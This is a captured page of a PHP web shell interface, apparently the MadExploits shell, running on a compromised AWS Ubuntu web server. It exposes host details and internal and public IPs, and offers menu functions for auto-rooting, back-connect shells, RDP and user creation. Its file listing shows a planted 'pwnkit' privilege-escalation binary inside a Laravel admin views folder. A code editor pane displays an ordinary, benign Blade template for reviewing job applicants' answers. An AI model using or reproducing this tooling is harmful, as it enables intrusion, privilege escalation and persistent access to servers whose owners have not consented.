Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.15.27.146
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
resources /
views /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
add_food.blade.php
3.43
KB
-rw-rw-r--
add_tags.blade.php
3.46
KB
-rw-rw-r--
add_user.blade.php
1.98
KB
-rw-rw-r--
answers.blade.php
7.38
KB
-rw-rw-r--
assessment.blade.php
2.84
KB
-rw-rw-r--
edit_food.blade.php
1.96
KB
-rw-rw-r--
find_food.blade.php
3.98
KB
-rw-rw-r--
googleda794cd9937527d01.html
41
B
-rw-r--r--
lockdown.blade.php
10.15
KB
-rw-rw-r--
lockdown_places.blade.php
10.13
KB
-rw-rw-r--
new_place_redo.blade.php
21.2
KB
-rw-rw-r--
new_places.blade.php
24.65
KB
-rw-rw-r--
place.blade.php
3.03
KB
-rw-rw-r--
place_food.blade.php
6.03
KB
-rw-rw-r--
places_no_food.blade.php
9.6
KB
-rw-rw-r--
popular.blade.php
7.46
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
registered_places.blade.php
3.69
KB
-rw-rw-r--
search.blade.php
2.5
KB
-rw-rw-r--
user_places.blade.php
14.22
KB
-rw-rw-r--
users.blade.php
3.9
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : answers.blade.php
@extends('layouts.admin') @section('style') @parent <link rel="stylesheet" href="/css/test.css"> <style> .answer { font-style: italic; } h5 { margin-bottom: 0; } .question { padding: 15px 0; } .five .form-inputs .form-group { display: block; } .form-inputs img { width: 100px; } </style> @endsection @section('content') <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h4 class="card-title">Answers <strong>{{ $user['name'] }}</strong> - <strong>{{ $user['email'] }}</strong></h4> @if (isset($user['status'])) @if ($user['status'] == 'rejected') <h3>REJECTED</h3> @else <h3>ACCEPTED</h3> @endif @else <button class="btn btn-danger response" data-type="reject" data-user="{{ $user['email'] }}" {{ isset($user['status']) ? 'disabled' : '' }}>Reject</button> <button class="btn btn-success response" data-type="accept" data-user="{{ $user['email'] }}" {{ isset($user['status']) ? 'disabled' : '' }}>Accept</button> @endif </div> <div class="card-body"> @if (count($answer)) <div class="question"> <h5 class="question-text">1. World Food Day is celebrated on the 16th of October every year and is a day of action dedicated to tackling global hunger. Cravvings is a platform that connects people to food vendors around them and allows them share their experiences by leaving reviews.</h5> <div class="form-group"> <label htmlFor="cel-post">Come up with a celebratory post for Cravvings to celebrate World Food Day</label> <div class="answer"> {{ $answer[0]['wfd'] ?? '' }} </div> </div> <div class="form-group"> <label htmlFor="on-off">Come up with offline and online activities Cravvings can do to celebrate World Food Day</label> <div class="answer"> {{ $answer[0]['offline'] ?? '' }} </div> </div> </div> @isset($answer[1]) <div class="question"> <h5 class="question-text">2. What brand’s content do you like and why?</h5> <div class="form-group"> <div class="answer"> {{ $answer[1]['brandcontent'] ?? '' }} </div> </div> </div> @endisset @isset($answer[2]) <div class="question"> <h5 class="question-text">3. Share three alternative uses for a pen</h5> <div class="form-group"> <label htmlFor="penone">Use Case 1</label> <div class="answer"> {{ $answer[2]['penone'] ?? '' }} </div> </div> <div class="form-group"> <label htmlFor="penone">Use Case 2</label> <div class="answer"> {{ $answer[2]['pentwo'] ?? '' }} </div> </div> <div class="form-group"> <label htmlFor="penone">Use Case 3</label> <div class="answer"> {{ $answer[2]['penthree'] ?? '' }} </div> </div> </div> @endisset @isset($answer[3]) <div class="question"> <h5 class="question-text">4. What’s one cost-effective thing we can do to create more awareness for Cravvings?</h5> <div class="form-group"> <div class="answer"> {{ $answer[3]['brand'] ?? '' }} </div> </div> </div> @endisset @isset($answer[4]) <div class="question five"> <h5 class="question-text">5. Caption these</h5> <div class="form-inputs"> <div class="form-group"> <label htmlFor="cap-one"> <img src="/images/test/caption1.jpg" alt="Caption One"/> </label> <div class="answer"> {{ $answer[4]['captionone'] ?? '' }} </div> </div> <div class="form-group"> <label htmlFor="cap-two"> <img src="/images/test/caption2.png" alt="Caption two"/> </label> <div class="answer"> {{ $answer[4]['captiontwo'] ?? '' }} </div> </div> <div class="form-group"> <label htmlFor="cap-three"> <img src="/images/test/caption3.png" alt="Caption three"/> </label> <div class="answer"> {{ $answer[4]['captionthree'] ?? '' }} </div> </div> <div class="form-group"> <label htmlFor="cap-four"> <img src="/images/test/caption4.jpg" alt="Caption four"/> </label> <div class="answer"> {{ $answer[4]['captionfour'] ?? '' }} </div> </div> </div> </div> @endisset @endif </div> </div> </div> </div> @endsection @section('scripts') <script> document.querySelectorAll('.response').forEach(resp => { resp.addEventListener('click', function(e) { const {user, type} = e.target.dataset; const headers = { 'X-CSRF-Token': document.querySelector('meta[name="csrf-token"]').getAttribute('value'), 'X-Requested-With': 'XMLHttpRequest' } const con = confirm('Are you sure?'); if(con){ fetch(`/admin/tester/${type}`, {method: 'POST', credentials: 'same-origin', body: JSON.stringify({email: user}), headers}) .then(response => response.json()) .then(res => { if(res.status === 'success') { e.target.textContent = res.message; } }) .catch(error => console.error(error)) } }); }); </script> @endsection
Close